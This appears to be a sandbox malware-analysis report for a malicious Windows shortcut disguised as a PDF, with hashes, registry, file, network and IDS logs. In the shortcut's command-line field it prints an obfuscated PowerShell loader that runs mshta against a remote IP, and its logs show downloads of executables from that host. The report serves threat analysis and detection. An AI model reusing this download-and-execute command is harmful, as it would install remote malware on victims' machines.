File name:	i.pdf.lnk.download.lnk
Full analysis:	https://app.any.run/tasks/2d4e6916-bcf8-44c1-8e45-2d12fdd0dced
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	March 24, 2025, 13:45:58
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	opendir loader putty rmm-tool
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe" KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:	62CC8963C5854935F922BE27928F1BD4
SHA1:	1B25D8DF97E41A04E2ED5E990318E402A821EEDD
SHA256:	03FAA7759E6DCF2DBA493E3DAC2C7514957C830E58181251FB6822A781D3B1C1
SSDEEP:	24:8N84Zsx/Tff1efVKayWtC+/CWgNgvgmgfgijg8gbgbdi3gvfF7g8gInupgmugmrQ:8wTX1e3ztoFOWDS0+do9aQCa+

Flags:	IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	(none)
TargetFileSize:	-
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	powershell.exe
RelativePath:	..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments:	. ([char]105+[char]101+[char]120)('m£££sh£t£££a ht£££t£££p£:£/£££/£££8£££8££.££1££5£1££.£1££9£2££.£52£££/£££c£od££e££1£/£co£££d£e£££' -replace '£')"
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe


(PID) Process:	(7052) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(7052) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(7052) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(6112) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:	write	Name:	Acrobat.Document.DC
Value:
(PID) Process:	(4688) Acrobat.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:	write	Name:	DisplayName
Value: Adobe Acrobat Reader Protected Mode
(PID) Process:	(4120) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:	write	Name:	bLastExitNormal
Value: 0
(PID) Process:	(4120) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	sProductGUID
Value: 4143524F4241545F475549445F4E474C5F44554D4D5900
(PID) Process:	(4120) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	sProductGUID
Value: 4143524F5F5245534944554500
(PID) Process:	(4120) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	bSynchronizeOPL
Value: 0
(PID) Process:	(4120) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	uLastAppLaunchTimeStamp
Value:

PID	Process	Filename		Type
1056	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8761a46198808b18.customDestinations-ms		binary
		MD5:D44C450EAD8EED38CEBEEC672D7DB1A5	SHA256:48AAE9632DDE0E5AC7D04E5FAA17908D54F2BFA406AF41275957980F1DE8FE5B
1056	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRN76UI3BAXXTSQ9AZXG.temp		binary
		MD5:D44C450EAD8EED38CEBEEC672D7DB1A5	SHA256:48AAE9632DDE0E5AC7D04E5FAA17908D54F2BFA406AF41275957980F1DE8FE5B
1056	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kzouaaio.hyb.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1056	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jpnclc4p.hxv.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4120	Acrobat.exe	C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal		binary
		MD5:767EBDBEC0DBCBAC951D925717E10F05	SHA256:C23EA3C96B820557F574142D43C105EF958716A6270DB82A4ED407F71174973B
5984	AcroCEF.exe	C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old		text
		MD5:EB1590F2607E1CE46DBF6A521F772EA0	SHA256:4355D9A8A115BA4E41178B456A8A5578846EB1F7EC9509249C2405F758F31731
7052	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\code[1]		executable
		MD5:5AC91E0B7DAD816D6369C3D3B428F646	SHA256:9F6DE548F884D5519AFD141F0F1BF92FABBEB7D1FB60E4E43B84A1D44ECAECEB
4120	Acrobat.exe	C:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt		text
		MD5:E7F030ED94117AB72F9E290D055106E5	SHA256:2978268DBC893A209215513AF741EEBA556C0075CC0B1EA5D24F9010AD5EB5AF
6112	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tjg1fm2n.0d0.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1056	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:9142765ED86A4DEC9234469DABE9A181	SHA256:AA14A3ACD71BA5A6A5F0FA753E4ED5B1AE054381465E6FFB2E55D8A953D37210

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6112	powershell.exe	GET	200	88.151.192.52:80	http://88.151.192.52/ukr/puttycl.exe	unknown	—	—	unknown
7052	mshta.exe	GET	200	88.151.192.52:80	http://88.151.192.52/code1/code	unknown	—	—	unknown
—	—	OPTIONS	204	50.16.47.176:443	https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=MY&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64	unknown	—	—	unknown
6112	powershell.exe	GET	200	88.151.192.52:80	http://88.151.192.52/ukr/invoce.pdf	unknown	—	—	unknown
—	—	GET	200	18.213.11.84:443	https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=MY&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64	unknown	binary	187 b	whitelisted
—	—	GET	200	23.50.131.75:443	https://acroipm2.adobe.com/23/rdr_64x/ENU/win/nooem/none/consumer/message.zip	unknown	compressed	168 Kb	whitelisted
—	—	GET	200	2.23.244.205:443	https://armmf.adobe.com/onboarding/smskillreader.txt	unknown	text	120 b	whitelisted
—	—	GET	200	95.100.184.205:443	https://geo2.adobe.com/	unknown	text	50 b	whitelisted
—	—	POST	500	40.91.76.224:443	https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail	unknown	xml	512 b	whitelisted
—	—	POST	500	40.91.76.224:443	https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail	unknown	xml	512 b	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
—	—	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
2104	svchost.exe	40.127.240.158:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
7052	mshta.exe	88.151.192.52:80	—	Dyjix Association	DE	unknown
4	System	192.168.100.255:137	—	—	—	whitelisted
6112	powershell.exe	88.151.192.52:80	—	Dyjix Association	DE	unknown
968	AcroCEF.exe	95.100.184.205:443	geo2.adobe.com	AKAMAI-AS	FR	whitelisted
968	AcroCEF.exe	52.6.155.20:443	p13n.adobe.io	AMAZON-AES	US	whitelisted
968	AcroCEF.exe	2.23.244.205:443	armmf.adobe.com	Ooredoo Q.S.C.	QA	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 40.127.240.158	whitelisted
google.com	172.217.16.206	whitelisted
geo2.adobe.com	95.100.184.205	whitelisted
p13n.adobe.io	52.6.155.20 3.233.129.217 52.22.41.97 3.219.243.226	whitelisted
armmf.adobe.com	2.23.244.205	whitelisted
acroipm2.adobe.com	23.50.131.87 23.50.131.75	whitelisted
activation-v2.sls.microsoft.com	40.91.76.224	whitelisted

PID	Process	Class	Message
7052	mshta.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7052	mshta.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6112	powershell.exe	Potentially Bad Traffic	ET INFO Dotted Quad Host PDF Request
6112	powershell.exe	Potentially Bad Traffic	ET INFO Executable Download from dotted-quad Host
6112	powershell.exe	Potential Corporate Privacy Violation	ET INFO PE EXE or DLL Windows file download HTTP
6112	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
6112	powershell.exe	Potentially Bad Traffic	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
6112	powershell.exe	Potentially Bad Traffic	ET INFO Embedded Executable File in PDF - This Program Cannot Be Run in DOS Mode

General Info

i.pdf.lnk.download.lnk

62CC8963C5854935F922BE27928F1BD4

1B25D8DF97E41A04E2ED5E990318E402A821EEDD

03FAA7759E6DCF2DBA493E3DAC2C7514957C830E58181251FB6822A781D3B1C1

24:8N84Zsx/Tff1efVKayWtC+/CWgNgvgmgfgijg8gbgbdi3gvfF7g8gInupgmugmrQ:8wTX1e3ztoFOWDS0+do9aQCa+

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Unrestricted)

Run PowerShell with an invisible window

Request from PowerShell that ran from MSHTA.EXE

Downloads the requested resource (POWERSHELL)

SUSPICIOUS

Probably obfuscated PowerShell command line is found

Starts POWERSHELL.EXE for commands execution

Process drops legitimate windows executable

Executes script without checking the security policy

Executable content was dropped or overwritten

Connects to the server without a host name

Process requests binary or script from the Internet

PUTTY has been detected

Potential Corporate Privacy Violation

The process bypasses the loading of PowerShell profile settings

INFO

Checks proxy server information

Reads Internet Explorer settings

Script raised an exception (POWERSHELL)

Disables trace logs

Checks whether the specified file exists (POWERSHELL)

The sample compiled with english language support

Application launched itself

The executable file from the user directory is run by the Powershell process

Checks supported languages

Reads the computer name

Reads the software policy settings

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings